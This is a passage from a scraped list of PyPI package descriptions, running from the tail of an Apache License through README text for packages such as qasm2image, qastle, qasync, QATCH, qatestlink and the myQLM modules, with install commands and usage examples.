shall any Contributor be\nliable to You for damages, including any direct, indirect, special,\nincidental, or consequential damages of any character arising as a\nresult of this License or out of the use or inability to use the\nWork (including but not limited to damages for loss of goodwill,\nwork stoppage, computer failure or malfunction, or any and all\nother commercial damages or losses), even if such Contributor\nhas been advised of the possibility of such damages.Accepting Warranty or Additional Liability. While redistributing\nthe Work or Derivative Works thereof, You may choose to offer,\nand charge a fee for, acceptance of support, warranty, indemnity,\nor other liability obligations and/or rights consistent with this\nLicense. However, in accepting such obligations, You may act only\non Your own behalf and on Your sole responsibility, not on behalf\nof any other Contributor, and only if You agree to indemnify,\ndefend, and hold each Contributor harmless for any liability\nincurred by, or claims asserted against, such Contributor by reason\nof your accepting any such warranty or additional liability.END OF TERMS AND CONDITIONSAPPENDIX: How to apply the Apache License to your work.To apply the Apache License to your work, attach the following\nboilerplate notice, with the fields enclosed by brackets \u201c[]\u201d\nreplaced with your own identifying information. (Don\u2019t include\nthe brackets!) The text should be enclosed in the appropriate\ncomment syntax for the file format. We also recommend that a\nfile or class name and description of purpose be included on the\nsame \u201cprinted page\u201d as the copyright notice for easier\nidentification within third-party archives.Copyright [yyyy] [name of copyright owner]Licensed under the Apache License, Version 2.0 (the \u201cLicense\u201d);\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License athttp://www.apache.org/licenses/LICENSE-2.0Unless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \u201cAS IS\u201d BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.Description: # qasm\nPlatform: UNKNOWN\nRequires-Python: >=3.5\nDescription-Content-Type: text/markdown"} +{"package": "qasm2error", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "qasm2image", "pacakge-description": "The qasm2image repository provides functions to represent quantum circuits written following theOpenQASMspecification.InstallationDependenciesThe tool and all the dependencies are available via the PIP tool. See the installation instructions below.Installation procedurepip3installcffipip3installqasm2imageUsageIn a Python environnement# Import the functionsfromqasm2imageimportqasm2svgfromqasm2imageimportqasm2png# Generate your QASM string (either read from a file or generate a circuit and ask for its QASM).qasm_str=\"...\"# Define the basis used to represent the circuitbasis='u1,u2,u3,U,cx'# Compute the SVG representationsvg_str=qasm2svg(qasm_str,basis=basis,show_clbits=True)# Compute the PNG representationpng_bytes=qasm2png(qasm_str,basis=basis,show_clbits=True)# Types of the outputsasserttype(svg_str)isstrasserttype(png_bytes)isbytes# Write the result into fileswithopen('circuit.svg','w')assvg_file:svg_file.write(svg_str)# Don't forget to write in *binary* mode for PNGwithopen('circuit.png','wb')aspng_file:png_file.write(png_bytes)In a shell environnementA script is provided to change QASM code directly from the command line.$qasm2image-husage:qasm2image[-h][-bBASIS][--hide-clbits][-sSCALE]input_fileoutput_fileTransformaquantumcircuitinQASMformattoanimageformat.positionalarguments:input_filetheQASMfileimplementingthecircuittotransformoutput_filetheimagefilethatwillbegeneratedbythetooloptionalarguments:-h,--helpshowthishelpmessageandexit-bBASIS,--basisBASISacomma-separatedlistofgatenameswhichrepresentthegatebasisinwhichthecircuitwillbedecomposed--hide-clbitsifpresent,classicalbitswillnotberepresented-sSCALE,--scaleSCALEscaleofthePNGimage.SVGoutputisnotaffectedbythisparameterLicenseThis project is distributed under theCeCILL-Blicense. A copy of the whole license is included\nin the repository.In order to use the work in this repository you have a strong obligation to cite (as stated in the license):The author of the work: Adrien Suau (see on my GitHub page ormail meif any doubt).The CERFACS (Centre Europ\u00e9en de Recherche et de Formation Avanc\u00e9e en Calcul Scientifique).Outputadder.qasmqft.qasminverseqft1.qasminverseqft2.qasmqec.qasmThe same QASM code, but with thehide-clbitsoption set:qasm2image--hide-clbitsqec.{qasm,png}.teleportv2.qasm"} +{"package": "qaspen", "pacakge-description": "QASPEN - From Python To Databases"} +{"package": "qaspen-psycopg", "pacakge-description": "No description available on PyPI."} +{"package": "qassure", "pacakge-description": "Data Quality AuditorThis module provides a useful base for anyone looking to audit data structure to ensure their\nconformance with a given specification. It allows for the creation of a report of all the\ndeficiencies within a file and provides an easy-to-read framework for creating tests.Read thefull documentationfor more details."} +{"package": "qastle", "pacakge-description": "qastle (Query AST Language Expressions)This document describes a language intended to be used inServiceXandfunc_adlfor messages which represent abstract syntax trees (ASTs). The trees specify columnar selections of HEP data.IntroductionInfluencesastmodulein PythonFuncADL natively uses ASTs as represented by Python's standardastmodule, thus it is convenient to base everything at least loosely on Python's ASTs to ease translation. ASTs in Python, however, are extremely dense with information important for a full-featured general programming language but not relevant or useful for our purposes in forming selections of columns.LINQFuncADL is roughly based onLINQtoROOT, which was based on using LINQ queries on data in ROOT format. LINQ is a query language native to C#. The query operators used in FuncADL (Select,SelectMany,Where, etc.) are those of LINQ, so many of the AST nodes will need to represent these operators.Common LispLisp is a functional programming language with a minimalist syntax definition. We're aiming to use similar syntax because of how sparse it is, so that representations of AST nodes are very lean.Guiding principlesI try not to deviate from the influences listed above without good reason, since they are all already well-established standards. However, with influences from three different languages, it's impossible to adhere to all of them anyway.For simplificaion and clarity, anything in Python'sastthat does not affect static translation into a columnar selction is removed.Anything that would result in ambiguity when statically converting to a Python AST with LINQ queries or would prevent this conversion from being possible should be explicitly disallowed for easier debugging.I'm trying to keep the syntax both as simple and as uniform as possible while maintaining all necessary functionality. By this, I mean in the sense of the simplicity and uniformity of the definition, which also results in the least complex parsing. Note that this does not result in the most compact AST text possible.Language specificationSyntaxThe syntax/grammar definition is discussedhere. Like Lisp, the language consists solely of s-expressions. S-expressions here represent AST nodes and are either atoms--which include literals and identifiers--or composites of other s-expressions. Literals and names are nearly identical to those in Python. Composites are of the form:( ...)They look like bare lists from Lisp, with the first element describing the type of AST node, and the rest of the elements being the components of the node.SemanticsAll defined s-expressions are listed here, though this specification will be expanded in the future. The symbol*is used as a suffix here in its regex meaning (i.e., zero or more of the object that it follows are expected). Except where there is a restriction explicitly mentioned in the templates below, any type of s-expression can used as an element of a composite s-expression.Atomic s-expressions (atoms):NumbersStringsIdentifiersVariable namesReserved identifiers:True,False, andNoneCannot be used as variable namesComposite s-expressions:Lists:(list *)Dictionary:(dict )keysandvaluesmust each be alistAttributes:(attr )attributemust be a string literalSubscripts:(subscript )Function calls:(call *)Conditionals:(if )Unary operators:( )must benotor~Binary operators:( )must be one of+,-,*,/,%,**,//,and,or,&,|,^,<<,>>,==,!=,<,<=,>,>=Lambdas:(lambda )argumentsmust be alistcontaining only variable namesWhere:(Where )predicatemust be alambdawith one argumentSelect:(Select )selectormust be alambdawith one argumentSelectMany:(SelectMany )selectormust be alambdawith one argumentFirst:(First )Last:(Last )ElementAt:(ElementAt )indexmust be an integerContains:(Contains )Aggregate:(Aggregate )funcmust be alambdawith two argumentsCount:(Count )Max:(Max )Min:(Min )Sum:(Sum )All:(All )predicatemust be alambdawith one argumentAny:(Any )predicatemust be alambdawith one argumentConcat:(Concat )Zip:(Zip )OrderBy:(OrderBy )key_selectormust be alambdawith one argumentOrderByDescending:(OrderByDescending )key_selectormust be alambdawith one argumentChoose:(Choose )nmust be an integerExampleThe following query for eight columns:data_column_source.Select(\"lambda Event: (Event.Electrons.pt(),Event.Electrons.eta(),Event.Electrons.phi(),Event.Electrons.e(),Event.Muons.pt(),Event.Muons.eta(),Event.Muons.phi(),Event.Muons.e())\")becomes(Selectdata_column_source(lambda(listEvent)(list(call(attr(attrEvent'Electrons')'pt'))(call(attr(attrEvent'Electrons')'eta'))(call(attr(attrEvent'Electrons')'phi'))(call(attr(attrEvent'Electrons')'e'))(call(attr(attrEvent'Muons')'pt'))(call(attr(attrEvent'Muons')'eta'))(call(attr(attrEvent'Muons')'phi'))(call(attr(attrEvent'Muons')'e')))))Seethis Jupyter notebookfor a more thorough example.Nota beneThe mapping between Python and qastle expressions is not strictly one-to-one. There are some Python nodes with more specific functionality than needed in the textual AST representation. For example, all Pythontuples are converted to(list)s by qastle."} +{"package": "qastutil", "pacakge-description": "qastutilAuthor: Dr Jie Zheng\nv1.0 2023RIntroductionSome quick astronomical functions.Functionsdec2dms: transfer decimal to sexagesimal deg-min-sec, for Decdec2hms: transfer decimal to sexagesimal hour-min-sec, for RAdms2dec: transfer sexagesimal deg-min-sec to decimal, for Dechms2dec: transfer sexagesimal hour-min-sec to decimal, for RAcoorddec2dms: transfer astropy.coord.dec to deg-min-seccoordra2hms: transfer astropy.coord.ra to hour-min-sechour2str: transfer decimal hour to hour-min-sechourangle: computer hour angle between lst and raangle_dis: distance between two angles, result between -180 and +180distance: distance between two sphere pointsazalt: az & alt for object (ra, dec) at lat, lstmjd: from y, m, d, h, s, s, tz to mjdday_of_year: day serial number in given yearfmst: fast midnight sidereal timemjd2: from y, m, d, h, s, s, tz to mjdnight_len: n of hours from sunset to sunrisenight_time: sunset and sunrise for given yr, mn, dy, lon, lat, tzmjd_of_night: get 4-digit mjd code for the site, using local 18:00mjd2hour: Extract hour part from mjdsun_action: Get time of sun pass specified altitude, in this nightairmass: airmass from lat, lst, ra, declst: get local sidereal time for longitude at mjd, no astropysun_pos: sun position of given mjdmoon_pos: moon position of given mjdmoon_phase: moon phase of given mjd, by sun-earth-moon anglemoon_phase2: moon phase by moon cycle"} +{"package": "qasymphony-qtest-library", "pacakge-description": "Python QTest LibraryA client library to interact with the qTest API, which one can reference here:api.qasymphony.comInstallationpipinstallqasymphony-qtest-libraryUsagefromqtestimportqtestqtest=qtest.QTestClient(username=\"username@yourco.com\",password=\"password\",site_name=\"yourco\")all_projects=qtest.get_projects()project_names=[project['name']forprojectinall_projects]print(project_names)"} +{"package": "qasync", "pacakge-description": "qasyncIntroductionqasyncallows coroutines to be used in PyQt/PySide applications by providing an implementation of thePEP 3156event loop.Withqasync, you can useasynciofunctionalities directly inside Qt app's event loop, in the main thread. Using async functions for Python tasks can be much easier and cleaner than usingthreading.ThreadorQThread.If you need some CPU-intensive tasks to be executed in parallel,qasyncalso got that covered, providingQEventLoop.run_in_executorwhich is functionally identical to that ofasyncio.Basic ExampleimportsysimportasynciofromqasyncimportQEventLoop,QApplicationfromPySide6.QtWidgetsimportQWidget,QVBoxLayoutclassMainWindow(QWidget):def__init__(self):super().__init__()self.setLayout(QVBoxLayout())self.lbl_status=QLabel(\"Idle\",self)self.layout().addWidget(self.lbl_status)@asyncCloseasyncdefcloseEvent(self,event):pass@asyncSlot()asyncdefonMyEvent(self):passif__name__==\"__main__\":app=QApplication(sys.argv)event_loop=QEventLoop(app)asyncio.set_event_loop(event_loop)app_close_event=asyncio.Event()app.aboutToQuit.connect(app_close_event.set)main_window=MainWindow()main_window.show()withevent_loop:event_loop.run_until_complete(app_close_event.wait())More detailed examples can be foundhere.The Future ofqasyncqasyncis a fork ofasyncqt, which is a fork ofquamash.qasyncwas created because those are no longer maintained. May it live longer than its predecessors.qasyncwill continue to be maintained, and will still be accepting pull requests.RequirementsPython >= 3.8PyQt5/PyQt6 or PySide2/PySide6qasyncis tested on Ubuntu, Windows and MacOS.If you need Python 3.6 or 3.7 support, use thev0.25.0tag/release.InstallationTo installqasync, usepip:pip install qasyncLicenseYou may use, modify and redistribute this software under the terms of theBSD License. SeeLICENSE."} +{"package": "qat", "pacakge-description": "Qat (Qt Application Tester)Qat is a testing framework for Qt-based applications.Qat provides a Python API to interact with any existing Qt application by accessing QML/QtQuick/QWidget elements and simulating user manipulations.It is also integrated tobehaveto support Behavior-Driven Development (BDD) with theGherkin language.Although Qat uses the GUI to interact with the tested application, it is oriented towards BDD and functional testing rather than pure UI or non-regression testing.The main objective of Qat is to provide quick feedback to developers and easy integration to build systems.The complete documentation is available onreadthedocsand on Qat'sGitlab project."} +{"package": "qatamagochi", "pacakge-description": "qatamagochiInstall qatamagochi from PyPi.pipinstallqatamagochiExample# Import libraryfromqatamagochiimportQatamagochi# Initializemodel=Qatamagochi(name='Daniel',tamagochi_name='Dinosaurio')# Run the modelmodel.speak()"} +{"package": "qatch", "pacakge-description": "QATCH: Benchmarking SQL-centric tasks with Table Representation Learning Models on Your DataThis repository is the official implementation\nofQATCH: Benchmarking SQL-centric tasks with Table Representation Learning Models on Your Datato appear in NeurIPS Dataset and Benchmark track 2023.\ud83d\udd25 Updates[2024-Jan-22]:\nAddDAMBER: (Data-AMBiguity testER)[2024-Jan-10]: Add JOIN tests for proprietary data[2023-Dec-15]: new License: Apache-2.0[2023-Nov-06]: Camera ready version is now available!check it out![2023-Nov-05]: QATCH can now be donwloaded from pip! Do not forget to check\nthedocumentation!\ud83c\udff4\udb40\udc76\udb40\udc75\udb40\udc6d\udb40\udc61\udb40\udc70\udb40\udc7f OverviewWhat is QATCH?Query-AidedTRLChecklist (QATCH) is a toolbox to highlight TRL models\u2019 strengths\nand weaknesses on prorietary tables for Question Answering (QA) and Semantic Parsing (SP).How does it work?Given a proprietary database as input, it generates a testing checklist for QA and SP.More specifically?A query generation algorithm crafts tests by means of the expressive power of SQL.Ok cool, that's it?To evaluate the model's predictions, we propose 5 new metrics intra and inter tuple.Where is processed the data?The data is processed locally. We do not store any data. If you use the ChatGPT\nwrapper the data is processed by OpenAI.Where can I check the results?The generated tests along with the predictions and the metric scores can be\ndownloadedhere. This is to\nprevent the costly generation of test results with the openAI API and to build trust in our results.QATCH's automatically generates and evaluates test checklists on TRL models based on the three-step process depicted\nbelow:QATCH-Generate. It generates a set of queries tailored to proprietary data. For each query it formulates both the\nSQL declaration, its free-text version, and the expected ground truth consisting of table instances.\nThe SQL declaration expresses the logical complexity of the query and reflects the presence/absence of specific\nfeatures peculiar to relational data model such as presence of missing values and duplicate values.TRL Model Predictions. It processes the tests for various TRL models and tasks. The current toolbox version\nsupports three Table Representation Learning (TRL) models for\nQA:TAPAS,TAPEXandOmnitab.\nIn addition, two LLMs are implemented for QA and SPChatGPT 3.5(need the API key)\nandLLama2(need the HuggingFace token).QATCH-Evaluate. It evaluates the models outputs according to a set of cross-task performance metrics.QATCH\u2019s metrics are computed between the model output (prediction) and expected\nground-truth results (target). The target is the answer of the NL question \"Show me all the data\" over\na table with three tuples and two attributes.Given the ground truth result (target) with three tuples over two attributes, we report the metric values for five\npredictions, coming either from a QA or from the execution of a query in SP. More details can be found in\nthemetricsfolderWho should use QATCH?QATCH is designed to create \"behavioral testing\" checklist for QA and SP tasks.\nThe checklist is used to understand in which case the models fail when processing proprietary data for QA and SP tasks.In a corporate setting, there are at least three scenarios where a given TRL model needs to be evaluated\nagainst proprietary datasets:Comparison: Compare TRL models fine-tuned on private examples to see which one performs best.Validation: As crafting examples is expensive, verify when the quality meets the requirements.Maintenance: Fine-tuned models need to be re-calibrated to avoid data and conceptual shifting,\ncontinuous evaluation helps the identification of this issue.But the usage of QATCH it is not limited to the TRL models. Indeed, we propose two scenarios\nwhere QATCH can be used with LLMs:LLM compatibility version: Compare different version of the same LLMs to see the best performing one.Prompt engineering: Analyse the best prompt definition based on the proprietary data.Use case example of engineer Walter.\nWith QATCH it is able to create a model ranking on his proprietary data for QA and SP.Project|--metric_evaluator.py# user interface to calculate metrics for QA or SP|--test_generator.py# user interface to run different SQL generators|--database_reader|--single_database.py# initialise single database|--multiple_databases.py# handle multiple single database instances|--metrics|--metric_evaluator.py# wrapper to initialise the user selected metrics|--abstract_metric.py# abstract class to handle common metric methods|--cell_precision_tag.py# implement cell precision tag|--cell_recall_tag.py# implement cell recall tag|--tuple_cardinality_tag.py# implement tuple cardinality tag|--tuple_constraint_tag.py# implement tuple constraint tag|--tuple_order_tag.py# implement tuple order tag|--models|--chatgpt|--abstract_chatgpt.py# abstract class to handle common methods for ChatGPT|--chatgpt_QA.py# implement chatgpt for QA task|--chatgpt_SP.py# implement chatgpt for SP task|--chatgpt|--abstract_llama2.py# abstract class to handle common methods for LLama2|--llama2_QA.py# implement llama2 for QA task|--llama2_SP.py# implement llama2 for SP task|--abstract_model.py# abstract class to handle common model methods|--tapas.py# implement input processing and the prediction for TAPAS|--tapex.py# implement input processing and the prediction for TAPEX|--omnitab.py# implement the input processing and the prediction for Omnitab|--sql_generator|--abstract_sql_generator.py# handle common methods for SQL generators|--select_generator.py# implement SELECT tests|--distinct_generator.py# implement DISTINCT tests|--orderby_generator.py# implement ORDERBY tests|--where_generator.py# implement WHERE tests|--groupby_generator.py# implement GROUPBY tests|--having_generator.py# implement HAVING tests|--simple_agg_generator.py# implement SIMPLE AGG tests|--null_generator.py# implement NULL generator tests\u26a1\ufe0f QuickstartInstallationYou can install QATCH by running the following commands:#Usingpoetry(recommended)poetry add QATCH#Usingpippip install QATCHSince QATCH is intended to be used without the inference step, the base installation does not come\nwith the models' requirements.\nHowever, in case you want to use our implementation you can add the extras requirements.#Usingpoetry(recommended)poetry add QATCH -E model#Usingpippip install QATCH[model]How to use QATCH with my data?Load your input dataCreate a connection between your data and the tool.\nIf your data is not stored in a sqlite database you can use our code to generate it.importpandasaspdfromqatch.database_readerimportSingleDatabasedata={\"year\":[1896,1900,1904,2004,2008,2012],\"city\":[\"athens\",\"paris\",\"st. louis\",\"athens\",\"beijing\",\"london\"]}table=pd.DataFrame.from_dict(data)db_tables={'olympic_games':table}# create database connection# create the sqlite database in \"db_save_path/db_id/db_id.sqlite\".db=SingleDatabase(db_path=\"db_save_path\",db_name=\"db_id\",tables=db_tables)Now we can create a connection with multiple databases:fromqatch.database_readerimportMultipleDatabases# The path to multiple databasesdb_save_path='test_db'databases=MultipleDatabases(db_save_path)QATCH-Generate: Generates the testsfromqatchimportTestGenerator# init generatortest_generator=TestGenerator(databases=databases)# generate tests for each database and for each generatortests_df=test_generator.generate()TRL Model Predictions: if you want to use any version of Tapas/Tapex for QA in Huggingface or chatGPT you can use the\nalready implemented modules but it is NOT mandatory.fromtqdmimporttqdmfromqatch.modelsimportTapas# init the modelmodel=Tapas(model_name=\"google/tapas-large-finetuned-wtq\")# iterate for each row and run predictiontqdm.pandas(desc=f'Predicting for{model.name}')tests_df[f'predictions_{model.name}']=tests_df.progress_apply(lambdarow:model.predict(table=databases.get_table(db_id=row['db_id'],tbl_name=row['tbl_name']),query=row['question'],tbl_name=row['tbl_name']),axis=1)QATCH-Evaluate: Evaluate the results.fromqatchimportMetricEvaluatorevaluator=MetricEvaluator(databases=databases)tests_df=evaluator.evaluate_with_df(tests_df,prediction_col_name=\"\",task=\"QA or SP\")The final dataframe contains:db_id: The database name associated with the test.tbl_name: The table name associated with the test.sql_tags: the SQL generator associated with the test.query: The generated query from step 1.question: The generated question from step 1. Used as input for the model.predictions_: The predicted query/cells from step 2.5 metrics: The metrics used to evaluate the models.\ud83c\udff0 Reproduce ExperimentsInstall and prepare dataWe suggest to create adatafolder in the project to store all the data but it is not mandatory.In case the input data are not in this folder, remember to change inread_datathebase_pathargumentmkdirdata/These are the tables we use to generate the results in the main paper.Notice that QATCH perfectly works with any table and the following are only a selected sample to higlight results in the\npaper.DataLink# rows# categorical cols# numerical colsexample colsSpiderlink----Sales-transactionslink500k53ProductNo, DateFitness-trackerslink56583Brand Name, DisplayAccount-fraudlink1M426DaysSinceRequest, Velocity6hLate-paymentlink246666InvoiceDate, DisputedHeart-attacklink303111# trtbps, # oldpeakBreast-cancerlink68656pgr, rfstimeAdult-censuslink32.6k96education, fnlwgtMushroomslink8.1k230cap-shape, ring-typeRun ExperimentsCurrent version of QATCH supports SP and QA tasks, however since we rely on third-party models\nnot all the experiments can be run using QATCH.\nSupported models:QA models: Tapas, Tapex, ChatGPT_QA, LLama2_QA and OmnitabSP models: ChatGPT_SP and LLama2_SPFor the proprietary data:pythonmain_reproducibility.py-gtfproprietary--taskQA--model_nameTapas-dsptest_db--inject_null_percentage0.0For Spider:pythonmain_reproducibility.py-gtfspider--taskQA--model_nameTapas-dsptest_db--inject_null_percentage0.0Instead, for the not supported models (because an API does not exist),\nthe only difference is that the prediction phase has to be done by the user."} +{"package": "qat-comm", "pacakge-description": "Module qat-commThis moduleqat-commis part ofmyQLMproject. myQLM is a quantum\nsoftware stack for writing, simulating, optimizing, and executing quantum programs. This module\nprovides all the data-structures needed bymyQLMPrerequisitesThis version of myQLM works on both Windows, macOS and Linux for different versions of Python 3. Please look at thecompatibility matrixto ensure myQLM is installable on your computer.This module can be installed by typing the following command:pip install myqlmLicensemyQLM EULA"} +{"package": "qat-compiler", "pacakge-description": "QAT(Quantum Assembly Toolchain) is a low-level quantum compiler and runtime which facilitates executing quantum IRs\nsuch asQASM,OpenPulseandQIRagainst QPU drivers.\nIt facilitates the execution of largely-optimised code, converted into abstract pulse- and hardware-level instructions,\nwhich are then transformed and delivered to an appropriate driver.InstallationQAT can be installed fromPyPIvia:pip install qat-compilerBuilding from SourceWe usepoetryfor dependency management and run onPython 3.8+.\nOnce both of these are installed run this in the root folder to install all the dependencies that you need:poetry installNoteIf you are contributing to the project we recommend that you also runpoetry run pre-commit installto enable pre-commit checks.RoadmapThis is a list of what we\u2019re currently working on! If you want to get involved, contact the person or group linked.In-development:Classical-quantum hybrid computation.John DumbellRuntime-embedded QEC.Jamie FrielDesigning / verifying suitability:Distributed QPU execution.John DumbellTo-do:Full QASM v3 support. Currently waiting for available parsers.ContributingTo take the first steps towards contributing to QAT, visit ourcontributiondocuments, which provides details about our\nprocess.\nWe also encourage new contributors to familiarise themselves with thecode of conductand to adhere to these\nexpectations.Where to get helpFor support, please reach out in theDiscussionstab of this repository or file anissue.LicenceThis code in this repository is licensed under the BSD 3-Clause Licence.\nPlease seeLICENSEfor more information.FeedbackPlease let us know your feedback and any suggestions by reaching out inDiscussions.\nAdditionally, to report any concerns orcode of conductviolations please use thisform.FAQWhy is this in Python?Mixture of reasons. Primary one is that v1.0 was an early prototype and since the majority of the quantum community\nknow Python it was the fastest way to build a system which the most people could contribute to building. The API\u2019s would\nalways stick around anyway, but as time goes on the majority of its internals has been, is being, or will be moved to Rust/C++.Where do I get started?Our tests are a good place to start as they will show you the various ways to run QAT. Running and then stepping\nthrough how it functions is the best way to learn.We have what\u2019s known as an echo model and engine which is used to test QATs functionality when not attached to a QPU.\nYou\u2019ll see these used almost exclusively in the tests, but you can also use this model to see how QAT functions on\nlarger and more novel architectures.High-level architectural documents are incoming and will help explain its various concepts at a glance, but\nright now aren\u2019t complete.What OS\u2019s does QAT run on?Windows and Linux are its primary development environments. Most of its code is OS-agnostic but we can\u2019t\nguarantee it won\u2019t have bugs on untried ones. Dependencies are usually where you\u2019ll have problems, not the core\nQAT code itself.If you need to make changes to get your OS running feel free to PR them to get them included.I don\u2019t see anything related to OQC\u2019s hardware here!Certain parts of how we run our QPU have to stay propriety and for our initial release we did not have time to\nproperly unpick this from things we can happily release. We want to release as much as possible and as you\u2019re\nreading this are likely busy doing just that.Do you have your own simulator?We have a real-time chip simulator that is used to help test potential changes and their ramifications to hardware.\nIt focuses on accuracy and testing small-scale changes so should not be considered a general simulator. 3/4 qubit\nsimulations is its maximum without runtime being prohibitive."} +{"package": "qat-core", "pacakge-description": "Module qat-coreThis moduleqat-coreis part ofmyQLMproject. myQLM is a quantum\nsoftware stack for writing, simulating, optimizing, and executing quantum programs. This module is the\ncore ofmyQLMPrerequisitesThis version of myQLM works on both Windows, macOS and Linux for different versions of Python 3. Please look at thecompatibility matrixto ensure myQLM is installable on your computer.This module can be installed by typing the following command:pip install myqlmLicensemyQLM EULA"} +{"package": "qat-devices", "pacakge-description": "Module qat-devicesThis moduleqat-devicesis part ofmyQLMproject. myQLM is a quantum\nsoftware stack for writing, simulating, optimizing, and executing quantum programs.This module provides a set of predefined HardwareSpecs objects corresponding to existing or common topologies.PrerequisitesThis version of myQLM works on both Windows, macOS and Linux for different versions of Python 3. Please look at thecompatibility matrixto ensure myQLM is installable on your computer.This module can be installed by typing the following command:pip install myqlmLicensemyQLM EULA"} +{"package": "qa_tech_basic", "pacakge-description": "No description available on PyPI."} +{"package": "qa_tech_basic_37", "pacakge-description": "No description available on PyPI."} +{"package": "qatestlink", "pacakge-description": "qatestlink XMLRPC manager for TestlinkBranchLinux DeployWindows DeploymasterPython tested versions3.73.63.53.4>=3.3SupportedSupportedSupportedSupportedNot SupportedHow to install ?Install from PIP :pip install qatestlinkInstall from setup.py file :python setup.py installDocumentationHow to use library, searching forUsage Guide.How to exec tests ?Install dependencies for tests :pip install-rrequirements-tests.txtTests from setup.py file :python setup.py testInstall TOX :pip install toxTests from tox :tox-l&& tox-eTOX_ENV_NAME(see tox.ini file to get environment names)TOX Env nameEnv descriptionpy34,py35,py36Python supported versionsdocsGenerate doc HTML in /docsflake8Exec linter in qalab/ tests/coverageGenerate XML and HTML reportsConfiguration File{\n \"connection\":{\n \"is_https\": false,\n \"host\": \"ntz-qa.tk\",\n \"port\": 86\n },\n \"dev_key\": \"1bfd2ef4ceda22b482b12f2b25457495\",\n \"log_level\":\"INFO\"\n}TestsYou will need real testlink app running before you can just execute on command linepython setup.py testGetting StartedJust starting example of usage before readUsage Guide.Create JSON configuration ( runtime or read from file,read config section)Instancetestlink_managerobjecttestlink_manager = TLManager(settings=my_json_config)Use somemethod name with prefix\u2018api_\u2019fromqatestlink.core.testlink_managerimportTLManagerfromqatestlink.core.utilsimportsettingsSETTINGS=settings(file_path=\"/home/user/config/dir/\",file_name=\"settings.json\")try:tlm=TLManager(settings=SETTINGS)ifnottlm.api_login():raiseException(\"Not logged for TestlinkWebApp\")# ENDprint(tlm.api_tprojects())print(\"Test PASSED!\")exceptExceptionaserr:print(\"ERROR:{}\".format(err))importpdb;pdb.set_trace()# TODO, remove DEBUG laneprint(\"Test FAILED!\")"} +{"package": "qa_tests", "pacakge-description": "UNKNOWN"} +{"package": "qatg", "pacakge-description": "No description available on PyPI."} +{"package": "qat-hardware", "pacakge-description": "Module qat-hardwareThis moduleqat-hardwareis part ofmyQLM Power Access (a.k.a. QLMaaS)project. myQLM is a quantum\nsoftware stack for writing, simulating, optimizing, and executing quantum programs.PrerequisitesThis version of myQLM works on both Windows, macOS and Linux for different versions of Python 3. Please look at thecompatibility matrixto ensure myQLM is installable on your computer.This module can be installed by typing the following command:pip install qlmaasLicenseAtos myQLM EULA"} +{"package": "qatingg", "pacakge-description": "CELLULANT EXPRESSqatinggPython adapter for Cellulant Tingg express checkout version 2.1To install:pip install qatinggFor all calls you first have to initiate the adapter with your credentials\nYou can find your credentials over here:Developer portalParamsParamRequiredDescriptionclient idTrueUsed to Encryptclient secretTrueUsed to Encryptservice codeTrueUsed to Encryptaccess_keyTrueUsed to EncryptdomainTruespecify environment:stagingorsandboxurlTrueUsed to pass custom urlpathTrueUsed to pass custom pathadapter = MulaAdapter(, , , , , , )domain:User have two options.These are cellulant's testing environments:STAGING \nor \nSANDBOX\nor\nLOCALadapter.get_encryption(msisdn='0730xxxxxxx',customer_first_name='John',customer_last_name='Doeh',customer_email='john.doeh@jd.com',transaction_id='',account_number='066564ACC',amount=1000,currency_code='KES',country_code='KE',description='Airticket',due_date='2019-10-0112:12:00',orint(30)#Minutespayer_client_code='i8UytECD',language_code='en',success_url='http://callbackurl.com/success',fail_url='http://callbackurl.com/fail',callback_url='http://callbackurl.com/callback')due_date:User can pass the number of minutes(int) for the session or use cellulant data format(''Y-m-d H:M:S'')\nTo get the express page:checkout_type:Cellulant have several ways of checkoutExample:\n-------------\nmodal\nexpress\nthemed-checkout\n---------------Note: Add payer client code, ONLY if you're testing single payment option'This will return checkout response as a url.Example below:Example urlCode Sampleimportsysfromtingg.adaptersimportTinggAdapterimportrandomdefget_response():init=TinggAdapter(iv_key=\"h3tckgMNxxxxx\",secret_key=\"Nmxx6546xxxxxx\",access_key=\"$2a$08$wQ2ghgfhgfhfghfh64564\",service_code=\"EWWW5763434\",domain=\"SANDBOX\",url=\"http://localhost:3020\",path=\"/\")response=init.get_encryption(msisdn='0724565xxxx',customer_first_name='John',customer_last_name='Doeh',customer_email='john.doeh@jd.com',transaction_id=random.randint(0,sys.maxunicode),account_number='3434364ACC',amount=1000,currency_code='UGX',country_code='UG',description='Air ticket',checkout_type=\"express\",due_date=30,# or \"2019-12-12 12:12:12\"payer_client_code='',language_code='en',success_url='http://callbackurl.com/success',fail_url='http://callbackurl.com/fail',callback_url='http://callbackurl.com/callback')#To see code returnedprint(response)returnresponseTestsRunning testspython setup.py test"} +{"package": "qat-lang", "pacakge-description": "Module qat-langThis moduleqat-langis part ofmyQLMproject. myQLM is a quantum\nsoftware stack for writing, simulating, optimizing, and executing quantum programs. This module\nprovides tools for building quantum circuits.PrerequisitesThis version of myQLM works on both Windows, macOS and Linux for different versions of Python 3. Please look at thecompatibility matrixto ensure myQLM is installable on your computer.This module can be installed by typing the following command:pip install myqlmLicensemyQLM EULA"} +{"package": "qatools", "pacakge-description": "QAQA is an advanced tool for Android testing!Installpip3install-Uqatools-ihttps://pypi.tuna.tsinghua.edu.cn/simpleDescriptionusage:qa[-h][-v]{clear,info,adb,remote,proxy,unproxy}...\n\nQAisanadvancedtoolforAndroidtesting!Created:Lijiawei.Version0.0.8\n\npositionalarguments:{clear,info,adb,remote,proxy,unproxy}sub-commandhelpclearclearappcachedata.infoshowappsettingpage.adbcompleteadbdebuggingcapability.remoteopenAndroiddeviceremotedebuggingport(5555).proxyenabledeviceglobalproxy(172.17.30.10:8888).unproxydisabledeviceglobalproxy.\n\noptionalarguments:-h,--helpshowthishelpmessageandexit-v,--versionshowversionClearClear app cache dataqaclearcom.test.appInfoShow app infoqainfocom.test.appAdbComplete adb debugging capabilityqaadbRemoteOpen Android device remote debugging port(5555)qaremoteProxyEnable device global proxy# default proxy port is 8888qaproxy# custom proxy portqaproxy5555UnproxyDisable device global proxyqaunproxy"} +{"package": "qatools-ifchange", "pacakge-description": "No description available on PyPI."} +{"package": "qat-quops", "pacakge-description": "Module qat-quopsThis moduleqat-quopsis part ofmyQLM Power Access (a.k.a. QLMaaS)project. myQLM is a quantum\nsoftware stack for writing, simulating, optimizing, and 